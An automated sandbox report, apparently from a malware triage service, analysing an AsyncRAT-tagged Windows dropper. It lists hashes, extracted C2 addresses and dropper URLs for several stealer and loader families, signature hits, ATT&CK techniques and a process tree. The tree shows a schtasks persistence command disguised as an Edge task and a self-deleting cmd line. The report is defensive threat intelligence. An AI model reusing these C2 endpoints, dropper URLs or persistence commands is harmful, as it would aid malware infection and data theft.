asyncrat | 2fcad226b17131da4274e1b9f8f31359bdd325c9568665f08fd1f6c5d06a23ce

Analysis

max time kernel
9s
max time network
1055s
platform
windows10-2004_x64
resource
win10v2004-20231215-en
resource tags

arch:x64arch:x86image:win10v2004-20231215-enlocale:en-usos:windows10-2004-x64system
submitted
30-01-2024 00:44

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

4363463463464363463463463.exe
Size

10KB
MD5

2a94f3960c58c6e70826495f76d00b85
SHA1

e2a1a5641295f5ebf01a37ac1c170ac0814bb71a
SHA256

2fcad226b17131da4274e1b9f8f31359bdd325c9568665f08fd1f6c5d06a23ce
SHA512

fbf55b55fcfb12eb8c029562956229208b9e8e2591859d6336c28a590c92a4d0f7033a77c46ef6ebe07ddfca353aba1e84b51907cd774beab148ee901c92d62f
SSDEEP

192:xlwayyHOXGc20L7BIW12n/ePSjiTlzkGu8stYcFwVc03KY:xlwwHe/20PKn/cLTlHuptYcFwVc03K

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

https://maxximbrasil.com/themes/config_20.ps1

Extracted

Family

smokeloader

Botnet

pub1

Extracted

Family

metasploit

Version

windows/reverse_tcp

185.223.235.19:4444

Extracted

Family

stealc

http://185.172.128.79

Attributes

url_path
/3886d2276f6914c4.php

rc4.plain

Extracted

Family

smokeloader

Version

2022

http://trad-einmyus.com/index.php

http://tradein-myus.com/index.php

http://trade-inmyus.com/index.php

rc4.i32

Extracted

Family

redline

Botnet

siski

168.119.242.255:7742

Extracted

Family

lumma

http://freckletropsao.pw/api

Signatures

AsyncRat
AsyncRAT is designed to remotely monitor and control other computers written in C#.
rat asyncrat
BlackNET
BlackNET is an open source remote access tool written in VB.NET.
trojan blacknet

BlackNET payload 1 IoCs

Processes:

resource	yara_rule
behavioral1/files/0x000b0000000233f6-5534.dat	family_blacknet

DcRat
DarkCrystal(DC) is a new .NET RAT active since June 2019 capable of loading additional plugins.
rat infostealer dcrat

Detect ZGRat V1 24 IoCs

Processes:

resource	yara_rule
behavioral1/memory/1444-208-0x0000000005690000-0x0000000005728000-memory.dmp	family_zgrat_v1
behavioral1/memory/1444-235-0x0000000005690000-0x0000000005722000-memory.dmp	family_zgrat_v1
behavioral1/memory/1444-245-0x0000000005690000-0x0000000005722000-memory.dmp	family_zgrat_v1
behavioral1/memory/1444-258-0x0000000005690000-0x0000000005722000-memory.dmp	family_zgrat_v1
behavioral1/memory/1444-272-0x0000000005690000-0x0000000005722000-memory.dmp	family_zgrat_v1
behavioral1/memory/1444-285-0x0000000005690000-0x0000000005722000-memory.dmp	family_zgrat_v1
behavioral1/memory/1444-280-0x0000000005690000-0x0000000005722000-memory.dmp	family_zgrat_v1
behavioral1/memory/1444-289-0x0000000005690000-0x0000000005722000-memory.dmp	family_zgrat_v1
behavioral1/memory/1444-304-0x0000000005690000-0x0000000005722000-memory.dmp	family_zgrat_v1
behavioral1/memory/1444-312-0x0000000005690000-0x0000000005722000-memory.dmp	family_zgrat_v1
behavioral1/memory/1444-316-0x0000000005690000-0x0000000005722000-memory.dmp	family_zgrat_v1
behavioral1/memory/1444-320-0x0000000005690000-0x0000000005722000-memory.dmp	family_zgrat_v1
behavioral1/memory/1444-330-0x0000000005690000-0x0000000005722000-memory.dmp	family_zgrat_v1
behavioral1/memory/1444-333-0x0000000005690000-0x0000000005722000-memory.dmp	family_zgrat_v1
behavioral1/memory/1444-292-0x0000000005690000-0x0000000005722000-memory.dmp	family_zgrat_v1
behavioral1/memory/1444-263-0x0000000005690000-0x0000000005722000-memory.dmp	family_zgrat_v1
behavioral1/memory/1444-251-0x0000000005690000-0x0000000005722000-memory.dmp	family_zgrat_v1
behavioral1/memory/1444-239-0x0000000005690000-0x0000000005722000-memory.dmp	family_zgrat_v1
behavioral1/memory/1444-228-0x0000000005690000-0x0000000005722000-memory.dmp	family_zgrat_v1
behavioral1/memory/1444-215-0x0000000005690000-0x0000000005722000-memory.dmp	family_zgrat_v1
behavioral1/memory/1444-212-0x0000000005690000-0x0000000005722000-memory.dmp	family_zgrat_v1
behavioral1/files/0x00060000000232f5-3288.dat	family_zgrat_v1
behavioral1/files/0x000e000000023374-4333.dat	family_zgrat_v1
behavioral1/files/0x0008000000023379-4429.dat	family_zgrat_v1

Djvu Ransomware
Ransomware which is a variant of the STOP family.
ransomware djvu
Glupteba
Glupteba is a modular loader written in Golang with various components.
loader dropper glupteba

Glupteba payload 1 IoCs

Processes:

resource	yara_rule
behavioral1/memory/4848-101-0x0000000002E60000-0x000000000374B000-memory.dmp	family_glupteba

Lumma Stealer
An infostealer written in C++ first seen in August 2022.
stealer lumma
MetaSploit
Detected malicious payload which is part of the Metasploit Framework, likely generated with msfvenom or similar.
trojan backdoor metasploit

Process spawned unexpected child process 64 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

Processes:

schtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exe

description	pid	pid_target	Process	procid_target
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4584	512	schtasks.exe	92
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2996	512	schtasks.exe	92
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4496	512	schtasks.exe	92
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2620	512	schtasks.exe	92
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4620	512	schtasks.exe	92
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1012	512	schtasks.exe	92
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4816	512	schtasks.exe	92
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4832	512	schtasks.exe	92
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4180	512	schtasks.exe	92
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1504	512	schtasks.exe	92
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1628	512	schtasks.exe	92
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3188	512	schtasks.exe	92
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4496	512	schtasks.exe	92
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	804	512	schtasks.exe	92
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4484	512	schtasks.exe	92
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4004	512	schtasks.exe	92
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2396	512	schtasks.exe	92
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3156	512	schtasks.exe	92
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3004	512	schtasks.exe	92
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	5024	512	schtasks.exe	92
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3736	512	schtasks.exe	92
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1284	512	schtasks.exe	92
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2072	512	schtasks.exe	92
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1376	512	schtasks.exe	92
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1868	512	schtasks.exe	92
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1536	512	schtasks.exe	92
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3316	512	schtasks.exe	92
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	552	512	schtasks.exe	92
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1456	512	schtasks.exe	92
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3076	512	schtasks.exe	92
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2868	512	schtasks.exe	92
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2456	512	schtasks.exe	92
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	5456	512	schtasks.exe	92
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3152	512	schtasks.exe	92
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3220	512	schtasks.exe	92
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4144	512	schtasks.exe	92
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4720	512	schtasks.exe	92
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	5676	512	schtasks.exe	92
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	7616	512	schtasks.exe	92
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	5256	512	schtasks.exe	92
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4848	512	schtasks.exe	92
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	6904	512	schtasks.exe	92
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	7840	512	schtasks.exe	92
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	7988	512	schtasks.exe	92
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	7632	512	schtasks.exe	92
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3812	512	schtasks.exe	92
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2880	512	schtasks.exe	92
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4576	512	schtasks.exe	92
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4912	512	schtasks.exe	92
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	6424	512	schtasks.exe	92
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	7220	512	schtasks.exe	92
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	7612	512	schtasks.exe	92
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2856	512	schtasks.exe	92
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	5600	512	schtasks.exe	92
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	7832	512	schtasks.exe	92
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	5640	512	schtasks.exe	92
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	5020	512	schtasks.exe	92
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1896	512	schtasks.exe	92
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	6860	512	schtasks.exe	92
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	7708	512	schtasks.exe	92
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2868	512	schtasks.exe	92
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	6048	512	schtasks.exe	92
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	5232	512	schtasks.exe	92
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4308	512	schtasks.exe	92

RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
infostealer redline

RedLine payload 2 IoCs

Processes:

resource	yara_rule
behavioral1/memory/1652-281-0x0000000000400000-0x0000000000454000-memory.dmp	family_redline
behavioral1/files/0x0003000000000751-1738.dat	family_redline

SectopRAT
SectopRAT is a remote access trojan first seen in November 2019.
trojan rat sectoprat

SectopRAT payload 1 IoCs

Processes:

resource	yara_rule
behavioral1/files/0x0003000000000751-1738.dat	family_sectoprat

SmokeLoader
Modular backdoor trojan in use since 2014.
trojan backdoor smokeloader
Stealc
Stealc is an infostealer written in C++.
stealer stealc
ZGRat
ZGRat is remote access trojan written in C#.
rat zgrat

Async RAT payload 1 IoCs

rat

Processes:

resource	yara_rule
behavioral1/files/0x000c0000000232ae-2797.dat	asyncrat

DCRat payload 12 IoCs

Detects payload of DCRat, commonly dropped by NSIS installers.

rat

Processes:

resource	yara_rule
behavioral1/files/0x000600000002322a-115.dat	dcrat
behavioral1/files/0x000600000002322a-120.dat	dcrat
behavioral1/files/0x000600000002322a-113.dat	dcrat
behavioral1/files/0x000600000002323e-379.dat	dcrat
behavioral1/files/0x000600000002323e-380.dat	dcrat
behavioral1/memory/3284-387-0x0000000000990000-0x0000000000B56000-memory.dmp	dcrat
behavioral1/files/0x000600000002325e-475.dat	dcrat
behavioral1/files/0x0007000000023288-875.dat	dcrat
behavioral1/files/0x000600000002325e-1382.dat	dcrat
behavioral1/files/0x000600000002325e-1381.dat	dcrat
behavioral1/files/0x0006000000023328-3606.dat	dcrat
behavioral1/files/0x0008000000023393-4602.dat	dcrat

Downloads MZ/PE file

Modifies Windows Firewall 2 TTPs 1 IoCs

evasion

Windows Service

T1543.003

Disable or Modify System Firewall

T1562.004

Processes:

netsh.exe

pid	Process
8264	netsh.exe

Stops running service(s) 3 TTPs
evasion

Windows Service
T1543.003

Impair Defenses
T1562

Service Stop
T1489

.NET Reactor proctector 9 IoCs

Detects an executable protected by an unregistered version of Eziriz's .NET Reactor.

Processes:

resource	yara_rule
behavioral1/files/0x0007000000023220-60.dat	net_reactor
behavioral1/files/0x0007000000023220-67.dat	net_reactor
behavioral1/files/0x0007000000023220-68.dat	net_reactor
behavioral1/memory/3036-83-0x00000000002F0000-0x00000000007CA000-memory.dmp	net_reactor
behavioral1/files/0x000600000002322e-190.dat	net_reactor
behavioral1/files/0x000600000002322e-191.dat	net_reactor
behavioral1/memory/4080-255-0x0000000004A10000-0x0000000004A74000-memory.dmp	net_reactor
behavioral1/memory/4080-240-0x00000000049B0000-0x0000000004A16000-memory.dmp	net_reactor
behavioral1/files/0x000e000000023374-4333.dat	net_reactor

Checks computer location settings 2 TTPs 2 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

Processes:

4363463463464363463463463.exelatestroc.exe

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-1815711207-1844170477-3539718864-1000\Control Panel\International\Geo\Nation	4363463463464363463463463.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1815711207-1844170477-3539718864-1000\Control Panel\International\Geo\Nation	latestroc.exe

Executes dropped EXE 9 IoCs

Processes:

ofg7d45fsdfgg312.exelatestroc.exeInstallSetup8.exetoolspub1.exema.exe31839b57a4f11171d6abc8bbc4451ee4.exeBroomSetup.exerty25.exe32.exe

pid	Process
324	ofg7d45fsdfgg312.exe
3292	latestroc.exe
3212	InstallSetup8.exe
1216	toolspub1.exe
3036	ma.exe
4848	31839b57a4f11171d6abc8bbc4451ee4.exe
4732	BroomSetup.exe
2320	rty25.exe
1668	32.exe

Loads dropped DLL 1 IoCs

Processes:

InstallSetup8.exe

pid	Process
3212	InstallSetup8.exe

Modifies file permissions 1 TTPs 1 IoCs

discovery

File and Directory Permissions Modification

T1222

Processes:

icacls.exe

pid	Process
7004	icacls.exe

Themida packer 3 IoCs

Detects Themida, an advanced Windows software protection system.

themida

Processes:

resource	yara_rule
behavioral1/files/0x00080000000233d0-5106.dat	themida
behavioral1/files/0x00080000000233e1-5195.dat	themida
behavioral1/files/0x000700000002351d-7051.dat	themida

UPX packed file 4 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

Processes:

resource	yara_rule
behavioral1/files/0x000b00000002324c-2462.dat	upx
behavioral1/files/0x0006000000023368-4180.dat	upx
behavioral1/files/0x0006000000023394-4610.dat	upx
behavioral1/files/0x0006000000023430-6175.dat	upx

Unexpected DNS network traffic destination 1 IoCs

Network traffic to other servers than the configured DNS servers was detected on the DNS port.

Processes:

description	ioc
Destination IP	141.98.234.31

Uses the VBS compiler for execution 1 TTPs

Scripting
T1064

VMProtect packed file 1 IoCs

Detects executables packed with VMProtect commercial packer.

vmprotect

Processes:

resource	yara_rule
behavioral1/files/0x00090000000233b2-4761.dat	vmprotect

Legitimate hosting services abused for malware hosting/C2 1 TTPs 21 IoCs

Web Service

T1102

Processes:

flow	ioc
34	raw.githubusercontent.com
240	bitbucket.org
292	raw.githubusercontent.com
31	bitbucket.org
78	raw.githubusercontent.com
241	bitbucket.org
780	raw.githubusercontent.com
781	raw.githubusercontent.com
79	raw.githubusercontent.com
127	pastebin.com
319	pastebin.com
370	raw.githubusercontent.com
581	pastebin.com
579	pastebin.com
33	bitbucket.org
129	pastebin.com
215	raw.githubusercontent.com
318	pastebin.com
406	pastebin.com
499	bitbucket.org
500	bitbucket.org

Looks up external IP address via web service 11 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow	ioc
582	ip-api.com
203	ip-api.com
217	api.2ip.ua
279	api.ipify.org
451	ip-api.com
289	api.2ip.ua
590	api.ipify.org
201	api.ipify.org
202	api.ipify.org
216	api.2ip.ua
242	api.2ip.ua

Launches sc.exe 4 IoCs

Sc.exe is a Windows utlilty to control services on the system.

Processes:

sc.exesc.exesc.exesc.exe

pid	Process
3872	sc.exe
8844	sc.exe
6916	sc.exe
8676	sc.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Program crash 64 IoCs

Processes:

WerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exe

pid	pid_target	Process	procid_target
3504	4848	WerFault.exe	96
224	1668	WerFault.exe	101
1572	4848	WerFault.exe	96
3116	4848	WerFault.exe	96
5064	4848	WerFault.exe	96
3504	4848	WerFault.exe	96
4440	4848	WerFault.exe	96
3148	4848	WerFault.exe	96
380	4848	WerFault.exe	96
3480	4848	WerFault.exe	96
4960	4848	WerFault.exe	96
2996	4848	WerFault.exe	96
2740	4848	WerFault.exe	96
3332	4848	WerFault.exe	96
4452	4848	WerFault.exe	96
4132	4848	WerFault.exe	96
4964	4848	WerFault.exe	96
2396	4848	WerFault.exe	96
552	4848	WerFault.exe	96
4004	4848	WerFault.exe	96
1448	2012	WerFault.exe	113
6492	4848	WerFault.exe	96
676	4848	WerFault.exe	96
5208	4848	WerFault.exe	96
1512	5888	WerFault.exe	292
6048	1984	WerFault.exe	293
2296	5888	WerFault.exe	292
6904	1984	WerFault.exe	293
6612	5888	WerFault.exe	292
5860	1984	WerFault.exe	293
4028	5888	WerFault.exe	292
5704	1984	WerFault.exe	293
7036	1984	WerFault.exe	293
5748	5888	WerFault.exe	292
3668	4848	WerFault.exe	96
6856	1984	WerFault.exe	293
4132	5888	WerFault.exe	292
4004	2472	WerFault.exe	353
5608	5888	WerFault.exe	292
6068	1984	WerFault.exe	293
6196	2472	WerFault.exe	353
3676	1984	WerFault.exe	293
5992	5888	WerFault.exe	292
3184	2472	WerFault.exe	353
7164	464	WerFault.exe	389
6860	2472	WerFault.exe	353
6488	5200	WerFault.exe	372
5204	2472	WerFault.exe	353
1048	2472	WerFault.exe	353
1456	5888	WerFault.exe	292
6688	1984	WerFault.exe	293
2968	2472	WerFault.exe	353
5052	2472	WerFault.exe	353
5992	1984	WerFault.exe	293
6764	5888	WerFault.exe	292
6372	980	WerFault.exe	439
3088	5888	WerFault.exe	292
4900	1984	WerFault.exe	293
4440	2916	WerFault.exe	453
4904	2472	WerFault.exe	353
1436	2472	WerFault.exe	353
6108	5888	WerFault.exe	292
5560	3504	WerFault.exe	457
980	2472	WerFault.exe	353

Checks SCSI registry key(s) 3 TTPs 3 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

Processes:

toolspub1.exe

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	toolspub1.exe
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	toolspub1.exe
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	toolspub1.exe

Creates scheduled task(s) 1 TTPs 64 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task/Job

T1053

Processes:

pid	Process
2868	schtasks.exe
3152	schtasks.exe
2880	schtasks.exe
4912	schtasks.exe
1856	schtasks.exe
4832	schtasks.exe
5676	schtasks.exe
2396	schtasks.exe
3916	schtasks.exe
6720	schtasks.exe
5600	schtasks.exe
6792	schtasks.exe
7548	schtasks.exe
1504	schtasks.exe
5024	schtasks.exe
552	schtasks.exe
1376	schtasks.exe
3812	schtasks.exe
2868	schtasks.exe
8632	schtasks.exe
5596	schtasks.exe
3688	schtasks.exe
6904	schtasks.exe
3156	schtasks.exe
7260	schtasks.exe
6048	schtasks.exe
7184	schtasks.exe
2072	schtasks.exe
736	schtasks.exe
1352	schtasks.exe
784	schtasks.exe
1012	schtasks.exe
2704	schtasks.exe
7988	schtasks.exe
6216	schtasks.exe
7612	schtasks.exe
2996	schtasks.exe
2620	schtasks.exe
4496	schtasks.exe
3736	schtasks.exe
1456	schtasks.exe
3188	schtasks.exe
4720	schtasks.exe
7972	schtasks.exe
3724	schtasks.exe
4304	schtasks.exe
1284	schtasks.exe
3316	schtasks.exe
5772	schtasks.exe
5760	schtasks.exe
7356	schtasks.exe
5556	schtasks.exe
3220	schtasks.exe
6784	schtasks.exe
4620	schtasks.exe
7176	schtasks.exe
1152	schtasks.exe
2984	schtasks.exe
4004	schtasks.exe
5648	schtasks.exe
7632	schtasks.exe
1896	schtasks.exe
4180	schtasks.exe
1108	schtasks.exe

Delays execution with timeout.exe 4 IoCs

evasion

Processes:

timeout.exetimeout.exetimeout.exetimeout.exe

pid	Process
5684	timeout.exe
4912	timeout.exe
724	timeout.exe
3472	timeout.exe

Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery

T1018

Processes:

PING.EXE

pid	Process
4692	PING.EXE

Suspicious behavior: EnumeratesProcesses 2 IoCs

Processes:

toolspub1.exe

pid	Process
1216	toolspub1.exe
1216	toolspub1.exe

Suspicious use of AdjustPrivilegeToken 2 IoCs

Processes:

4363463463464363463463463.exema.exe

description	pid	Process
Token: SeDebugPrivilege	3484	4363463463464363463463463.exe
Token: SeDebugPrivilege	3036	ma.exe

Suspicious use of WriteProcessMemory 28 IoCs

Processes:

4363463463464363463463463.exeofg7d45fsdfgg312.exelatestroc.exeInstallSetup8.exe

description	pid	Process	procid_target
PID 3484 wrote to memory of 324	3484	4363463463464363463463463.exe	88
PID 3484 wrote to memory of 324	3484	4363463463464363463463463.exe	88
PID 3484 wrote to memory of 324	3484	4363463463464363463463463.exe	88
PID 324 wrote to memory of 2816	324	ofg7d45fsdfgg312.exe	89
PID 324 wrote to memory of 2816	324	ofg7d45fsdfgg312.exe	89
PID 324 wrote to memory of 2816	324	ofg7d45fsdfgg312.exe	89
PID 3484 wrote to memory of 3292	3484	4363463463464363463463463.exe	93
PID 3484 wrote to memory of 3292	3484	4363463463464363463463463.exe	93
PID 3484 wrote to memory of 3292	3484	4363463463464363463463463.exe	93
PID 3292 wrote to memory of 3212	3292	latestroc.exe	94
PID 3292 wrote to memory of 3212	3292	latestroc.exe	94
PID 3292 wrote to memory of 3212	3292	latestroc.exe	94
PID 3292 wrote to memory of 1216	3292	latestroc.exe	95
PID 3292 wrote to memory of 1216	3292	latestroc.exe	95
PID 3292 wrote to memory of 1216	3292	latestroc.exe	95
PID 3292 wrote to memory of 4848	3292	latestroc.exe	96
PID 3292 wrote to memory of 4848	3292	latestroc.exe	96
PID 3292 wrote to memory of 4848	3292	latestroc.exe	96
PID 3484 wrote to memory of 3036	3484	4363463463464363463463463.exe	97
PID 3484 wrote to memory of 3036	3484	4363463463464363463463463.exe	97
PID 3212 wrote to memory of 4732	3212	InstallSetup8.exe	148
PID 3212 wrote to memory of 4732	3212	InstallSetup8.exe	148
PID 3212 wrote to memory of 4732	3212	InstallSetup8.exe	148
PID 3292 wrote to memory of 2320	3292	latestroc.exe	98
PID 3292 wrote to memory of 2320	3292	latestroc.exe	98
PID 3484 wrote to memory of 1668	3484	4363463463464363463463463.exe	101
PID 3484 wrote to memory of 1668	3484	4363463463464363463463463.exe	101
PID 3484 wrote to memory of 1668	3484	4363463463464363463463463.exe	101

C:\Users\Admin\AppData\Local\Temp\4363463463464363463463463.exe
"C:\Users\Admin\AppData\Local\Temp\4363463463464363463463463.exe"
1⤵
- Checks computer location settings
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3484
- C:\Users\Admin\AppData\Local\Temp\Files\ofg7d45fsdfgg312.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\ofg7d45fsdfgg312.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of WriteProcessMemory
  PID:324
- - C:\Windows\SysWOW64\SCHTASKS.exe
    SCHTASKS /Create /TR "C:\Users\Admin\AppData\Local\Temp\Files\ofg7d45fsdfgg312.exe" /TN "MicrosoftEdge{e60e5877-76e2-4b84-98a8-90161a4b47ca}" /SC ONLOGON /F /RL HIGHEST
    3⤵
    PID:2816
- C:\Users\Admin\AppData\Local\Temp\Files\latestroc.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\latestroc.exe"
  2⤵
  - Checks computer location settings
  - Executes dropped EXE
  - Suspicious use of WriteProcessMemory
  PID:3292
- - C:\Users\Admin\AppData\Local\Temp\InstallSetup8.exe
    "C:\Users\Admin\AppData\Local\Temp\InstallSetup8.exe"
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    - Suspicious use of WriteProcessMemory
    PID:3212
  - - C:\Users\Admin\AppData\Local\Temp\nsl8975.tmp
      C:\Users\Admin\AppData\Local\Temp\nsl8975.tmp
      4⤵
      PID:2012
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c timeout /t 5 & del /f /q "C:\Users\Admin\AppData\Local\Temp\nsl8975.tmp" & del "C:\ProgramData\*.dll"" & exit
        5⤵
        
        PID:1688
      - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 5
        6⤵
        Delays execution with timeout.exe
        
        PID:3472
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 2012 -s 2376
        5⤵
        Program crash
        
        PID:1448
  - - C:\Users\Admin\AppData\Local\Temp\BroomSetup.exe
      C:\Users\Admin\AppData\Local\Temp\BroomSetup.exe
      4⤵
      Executes dropped EXE
      PID:4732
- - C:\Users\Admin\AppData\Local\Temp\toolspub1.exe
    "C:\Users\Admin\AppData\Local\Temp\toolspub1.exe"
    3⤵
    - Executes dropped EXE
    - Checks SCSI registry key(s)
    - Suspicious behavior: EnumeratesProcesses
    PID:1216
- - C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe
    "C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe"
    3⤵
    - Executes dropped EXE
    PID:4848
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 4848 -s 372
      4⤵
      Program crash
      PID:3504
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 4848 -s 388
      4⤵
      Program crash
      PID:1572
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 4848 -s 392
      4⤵
      Program crash
      PID:3116
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 4848 -s 680
      4⤵
      Program crash
      PID:5064
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 4848 -s 728
      4⤵
      Program crash
      PID:3504
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 4848 -s 728
